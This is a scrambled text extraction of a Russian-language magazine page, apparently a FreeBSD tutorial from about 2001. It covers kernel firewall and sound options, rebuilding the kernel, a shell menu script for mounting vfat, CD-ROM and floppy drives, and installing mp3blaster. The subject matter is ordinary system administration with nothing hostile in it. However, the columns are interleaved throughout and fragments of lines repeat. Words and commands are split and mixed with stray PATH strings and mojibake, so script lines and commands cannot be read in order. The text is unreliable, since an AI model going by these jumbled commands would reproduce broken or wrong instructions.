Добавил:
Опубликованный материал нарушает ваши авторские права? Сообщите нам.
Вуз: Предмет: Файл:
Скачиваний:
16
Добавлен:
20.04.2024
Размер:
16.06 Mб
Скачать

 

 

 

 

 

hang

e

 

 

 

 

 

 

 

 

 

 

PATH=/sbin:/usr/sbin:/bin:/

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

hang

e

 

 

 

 

 

 

 

 

 

 

 

C

 

E

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

C

 

 

E

 

 

 

 

 

 

 

 

X

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

X

 

 

 

 

 

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

-

 

 

 

 

 

 

d

 

 

 

 

 

F

 

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

F

 

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

 

 

 

 

t

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

t

 

 

P

D

 

 

 

 

 

 

 

 

 

o

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

D

018>59

 

 

 

 

o

 

 

 

 

 

 

 

 

 

 

r

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

r

 

 

 

 

 

 

 

BUY

NOW!

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

BUY

NOW!

 

 

 

 

 

 

 

 

 

to

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

to

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

 

 

 

 

w Click

 

 

 

 

 

 

 

o

m

 

 

 

 

 

 

(newpcm)

Oct

w Click

 

 

 

 

 

 

 

 

o

m

 

 

w

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

 

 

 

 

.

 

 

 

 

 

 

 

.c

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Audio

AudioDriverr (newpcm) Oct 15 2001 19:44:39

 

 

 

.

 

 

 

 

 

 

 

.c

 

 

 

 

 

p

df-

 

 

 

e

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

p

df-

 

 

 

 

e

 

 

 

 

 

 

 

 

g

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

g

 

 

 

 

 

 

 

 

 

c an

 

 

 

 

 

 

 

 

 

 

 

 

 

IPFIREWALL

 

FreeBSD

FreeBSD

 

 

 

 

 

c an

 

 

 

 

 

 

 

 

 

 

 

x

h

 

options

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

x h

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

2001

19:44:39Installed devices:

(newpcm)

Oct

15

 

2001

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

15

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

usr/bin:/usr/local/sbin:/u

 

Driver

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

PATH=/sbin:/usr/sbin:/bin:/usr/bin:/usr/local/sbin:/usr/FORecho Audio"

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

r

 

 

FreeBSD

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

options

 

 

IPFIREWALL

FreeBSDInstalled devices:pcm0: <VIA VT82C686A> at io 0xdc00 irq 12 (1p/1r channels duplex)

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Audio

 

 

 

 

 

 

 

 

 

 

 

 

 

irq

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Mounter v0.666at io 0xdc00

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

19:44:39

/

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

FreeBSD Audio Driver (newpcm) Oct 15VT82C686A>2001Driver19:44:39

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

local/bin:/usr/X11R6/bin

 

 

 

 

 

<VIA

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

WARD

 

 

 

 

 

 

 

 

 

 

Installedpcm0:

 

 

 

 

s:

 

 

 

 

 

 

0xdc00

 

irq

 

12

 

 

 

 

 

 

 

 

 

 

Installed devices:

 

 

 

 

Installeddevices:1) Mount vfat(newpcm)disks

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

pcm0:

 

 

 

 

 

 

 

 

 

 

 

at

io

Oct

 

15

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

exportlocal/bin:/usr/X11R6/bin< F de<VIA2 >

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

PATH

 

 

 

 

 

 

 

 

 

 

 

 

VT82C686A>

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

export

PATH

 

 

 

 

 

VER

-

<VIA

 

 

 

 

 

 

 

 

 

2001

 

 

19:

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

nels

pcm0:2) Mount cdrom

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

pcm0: <VIA VT82C686 > at io 0xdc00 irqVT82C686A>12 (1p/1r chan-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

ICMP BANDLIM

 

 

 

IPFIREWALLрусскими кракозябрами. Про установку кириллицы в

 

 

umountat/mnt/diskF

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

options

 

 

 

 

 

 

 

 

 

 

duplex)

 

 

 

 

 

io

0xdc00

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

options

 

TCP_DROP SYNFIN

 

 

 

 

 

 

 

 

 

 

 

 

 

;;

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

иксах и другие доки по этому поводу можно узнать на

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

nels duplex)

 

 

 

 

 

 

3) Mount floppy

 

irq

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

options

 

 

 

 

HOME=/root

 

 

www.freebsd.org.ru в разделе Русификация.

 

 

 

 

5)

cd /

 

 

 

 

12

(1p/1r

 

 

 

 

 

 

 

 

 

 

 

 

 

 

TCP_RESTRICT_RST

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

BOSE

 

 

 

 

 

 

 

 

 

МОНТАЖ ФАЙЛОВЫХ СИСТЕМ-

 

 

 

 

 

#размонтирование CDROM

 

 

 

 

 

 

 

c

 

 

 

 

 

 

 

 

 

 

 

 

Для построения брандмауэра (firewall):HOME

 

 

 

 

 

 

 

umount /mnt/cdrom

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

export

 

IPFIREWALL

_VER

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

IPFIREWALL

 

 

 

 

 

 

 

 

;;

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

options

 

 

 

 

 

 

Лучше всего этот подраздел проиллюстрировать на

 

 

6)

cd /

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

options

 

IPFIREWALL_FORWARD

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

options

 

IPFIREWALL VERBOSE

 

 

 

 

примере скрипта, автоматизирующего весь нудный

 

 

#размонтирование Floppy

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

_LIMIT=10

 

процесс монтирования и размонтирования. Тебе же

 

 

umount /mnt/floppy

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

optionsBOSEIPFIREWALL_VERBOSE_LIMIT=10

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

options

 

DUMMYNET

 

 

 

 

 

 

не хочется все опции в голове держать?

 

 

 

 

;;

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

IPDIVERT

 

 

 

DUMMYNET

 

 

 

 

 

 

 

 

 

7)

exit 0

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

options

 

 

 

 

 

 

cd /etc

 

 

 

 

 

 

 

 

 

 

;;

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

И рекомендую не включать в ядро опцию:

 

 

touch mymnt (создаем в /etc текстовый файл)

 

 

 

 

#если нажал не тот батон, то повтор ввода

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

IPDIVERT

 

 

 

 

 

 

 

 

 

 

 

*)

echo "Press number again"

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

udio

 

 

 

 

 

 

 

optionsIPFIREWALL DEFAULT_TO_ACCEPT

 

chmod +x mymnt (теперь он у нас имеет атрибут ис-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Этим ты включишь политику правил ipfw «все разре-

полнения)

 

 

 

 

 

 

 

 

 

 

 

continue

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Driver

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

devices:

шено», что не есть гуд, но об этом попозже.

 

vi mymnt (кодим скрипт)

 

 

 

 

 

 

 

 

esac

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

(newpcm)

Oct

15

2001

while true

 

 

 

 

 

 

 

 

 

 

done

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

do

 

 

 

 

 

 

 

 

 

 

 

exit 0

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Про включение в ядро твоей звуковухи почитай hand-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

VT82C686A> at

 

 

 

 

 

 

 

 

 

19:44:39

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

x)

 

 

 

 

 

 

 

 

 

 

 

book, раздел soundio

0xdc00

 

 

 

echo "

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Mounter v0.666

 

 

 

 

 

 

 

 

 

ТОРЧИМ СО ЗВУКОМ

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

http://www.freebsd.org/doc/en_US.ISO88591/books/hairq

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

12

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

ndbook/sound.html; я на работе для установки своего(1p/1r1) Mount vfat disks

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

интегрированного саунда включил:

 

 

 

 

chan-

 

 

 

 

 

 

 

 

Ни один системный конфигурационный системный

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

2) Mount cdrom

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

device pcm

 

 

 

 

 

 

 

 

 

 

3) Mount floppy

 

 

 

 

 

 

 

 

 

файл не может быть изменен без звукового сопро-

 

 

 

 

 

 

 

 

 

 

newpcm) Oct 15 2001 19:44:39

 

 

4) Unmount vfat disks

 

 

 

 

 

 

 

 

вождения! С таким девизом смотрим, что у нас тво-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

А дома для раритета Edison Gold16 (ess688) ISA non-

5) Unmount cdrom

 

 

 

 

 

 

 

 

рится с саундом:

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

PnP у меня вышло немного сложнее:

 

 

6) Unmount floppy

 

 

 

 

 

 

 

 

cat /dev/sndstat

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

t io 0xdc00 irq 12 (1p/1r chan-

 

 

7) Exit

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

device snd0

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

device sb0 at isa? port 0x220 irq 7 dqr 1

 

 

"

 

 

 

 

 

 

 

 

 

 

 

У меня получилось следующее:

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

device opl0 at isa? port 0x388

 

 

 

 

 

echo "Press button:"

 

 

 

 

 

 

 

 

FreeBSD Audio Driver (newpcm) Oct 15 2001 19:44:39

 

 

 

 

 

 

 

 

 

 

/usr/sbin:/bin:/usr/bin:/usr/local/sbin:/usr/

read button

 

 

 

 

 

 

 

 

 

 

Installed devices:

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Ну вот, конфиг готов, теперь набираем в консоли:

echo ""

 

 

 

 

 

 

 

 

 

 

pcm0: <VIA VT82C686A> at io 0xdc00 irq 12 (1p/1r

 

 

 

 

 

 

 

 

 

 

sr/X11R6/binconfig optimized

 

 

 

 

 

 

 

 

 

case $button in

 

 

 

 

 

 

 

 

 

channels duplex)

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Если возникли ошибки, лезем в конфиг и правим. Да-

1)

 

cd /

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

H=/sbin:/usr/sbin:/bin:/лее переходим в созданный каталог нашего нового #монтируем виндовые разделы с поддержкой рус-

 

 

Если увидишь device not configured, то тебе придется

 

 

 

 

 

 

 

 

 

 

H

 

 

 

 

 

 

 

 

 

 

 

ядра, вырабатываем зависимости, компилим и ста-

ских букв (если у тебя разделы находятся в extended,

 

 

снова перекомпилировать ядро, но уже с другими па-

 

 

 

 

 

 

 

 

 

 

TH=/sbin:/usr/sbin:/bin:/

 

 

 

 

 

 

 

 

 

 

раметрами для твоей звуковухи.

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

ATH=/sbin:/usr/sbin:/bin:/вим: например, ad0s4, то для того, чтобы определить на-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

usr/X11R6/bin

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Далее:

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

/sbin:/usr/sbin:/bin:/usr/bin:/usr/local/sbin:/usr/ot cd .. ../compile/optimized звания этих разделов, прибавляй единицу)

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

in: usr/X11R6/bin

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

cd /dev

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

r bin:/usr/local/sbin:/umake depend && make && make install mount msdos -L ru_RU.KOI8-R -W koi2dos /dev/ad0s1

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

sr/bin:/usr/local/sbin:/u

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

TH

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

/

 

 

 

 

 

 

 

 

 

 

 

./MAKEDEV snd0

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

/mnt/diskC

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

OME

 

 

 

 

 

 

 

 

 

После make depend, в принципе, можно делать make

mount_msdos -L ru_RU.KOI8-R -W koi2dos /dev/ad0s5

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

PATH

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

t

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

r

 

 

 

 

 

 

 

/

 

 

 

 

 

 

 

 

 

 

Тем самым мы создадим некое устройство, включаю-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

clean для подчистки фекалек в виде объектных фай-

/mnt/diskD/

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

l/bin:/usr/X11R6/binPATH

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

oot

 

 

 

 

 

 

 

 

 

 

 

лов. Все, курим. Если все прошло удачно, то прыга-

mount_msdos -L ru_RU.KOI8-R -W koi2dos /dev/ad0s6

 

 

щее в себя микшер, секвенсер и другие прибамбасы.

 

 

 

 

 

 

 

 

 

 

/root

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

cal/bin:/usr/X11R6/binем до потолка, если нет, то меняем параметры в opti- /mnt/diskE

 

 

 

 

 

 

 

 

 

 

Все! Саунд готов к работе. Осталось дело за mp3

 

 

 

 

 

 

 

 

 

 

ocal/bin:/usr/X11R6/bin

 

 

 

 

 

 

 

 

 

 

плеером. Можно, конечно, слушать и с помощью

 

 

 

 

 

 

 

 

 

 

bin:/usr/sbin:/bin:/usr/bin:/usr/local/sbin:/usr/OME mized. Чтобы новое ядро вступило в силу: mount_msdos -L ru_RU.KOI8-R -W koi2dos /dev/ad0s7

 

 

 

 

 

 

 

 

 

 

 

 

HOME

 

 

 

 

 

 

reboot

 

 

 

 

 

 

 

 

 

 

 

/mnt/diskF

 

 

 

 

 

 

 

 

 

 

mpg123 (есть на CDROM с FreeBSD в пакаджах), но я

 

 

 

 

 

 

 

 

 

 

port PATH

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

xport/s

 

PATH

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

рекомендую

пользоваться мега-рулезным

консоль-

 

 

 

 

 

 

 

 

 

 

PATH=

 

 

 

 

 

 

n:/usr/sbin:/bin:/usr/bin:/usr/local/sbin:/usr/;;

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

/usr/X11R6

 

 

 

 

 

 

 

 

 

 

 

 

2)

 

cd /

 

 

 

 

 

 

 

 

 

ным mp3blaster, который ставится на FreeBSD, Linux,

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Старое GENERIC ядро сохранится в корне как ker-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

nel.GENERIC, так что если твое свежеиспеченное яд-

#монтируем цэдером

 

 

 

 

 

 

 

 

NetBSD,

OpenBSD.

Забираем

 

åãî

 

здесь:

 

 

 

 

 

 

 

 

 

 

H=/sbin:/usr/sbin:/bin:/bin:/usr/X11R6 bin

 

 

 

 

 

 

 

 

 

 

 

ftp://mud.stack.nl/pub/mp3blaster/mp3blaster-

 

 

 

 

 

 

 

 

 

 

ATH

 

 

 

 

 

 

 

 

 

 

рышко не грузится, то необходимо:

 

 

mount -t cd9660 /dev/acd0c /mnt/cdrom

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

port

 

 

 

 

 

 

 

 

 

boot > unload (при загрузке выгружаем все модули)

;;

 

 

 

 

 

 

 

 

 

 

 

3.0p7.tar.gz, разворачиваем архив и ставим:

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

bin

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

tar zxvf mp3blaster-3.0p7.tar.gz

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

/bin:/usr/local/sbin:/uocal/bin:/usr/X11R6exportPATHPATHusr/sbin:/bboot > boot /kernel.GENERICusr/bin:/usr/local/sbin:/(возвращаемся к старо- 3) sr/ cd /

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

oot

 

 

 

 

 

 

 

 

 

 

ìó ÿäðó)

 

 

 

 

 

 

 

 

 

 

/

 

 

 

 

 

 

 

 

 

 

cd mp3blaster-3.0p7

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

PATH

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

#монтируем флоп

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

X11R6/bin

r

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

l/bin:/usr/X11R6/binE=/rootHOME=/root

 

 

 

 

 

 

 

 

mount -t msdos /dev/fd0 /mnt/floppy

 

 

 

 

 

./configure

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

OME

 

 

 

 

 

 

 

 

 

КИРИЛЛИЦИЗАЦИЯ ДАЕМОНА

 

 

 

;;

 

 

 

 

 

 

 

 

 

 

 

make

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

sbin:/usr/sbin:/bin:/usr/bin:/usr/local/sbin:/usr/r/X11R6

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

oot

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

make install

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

H=/sbin:/usr/sbin:/bin:/usr/bin:/usr/local/sbin:/usr/4) cd /

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

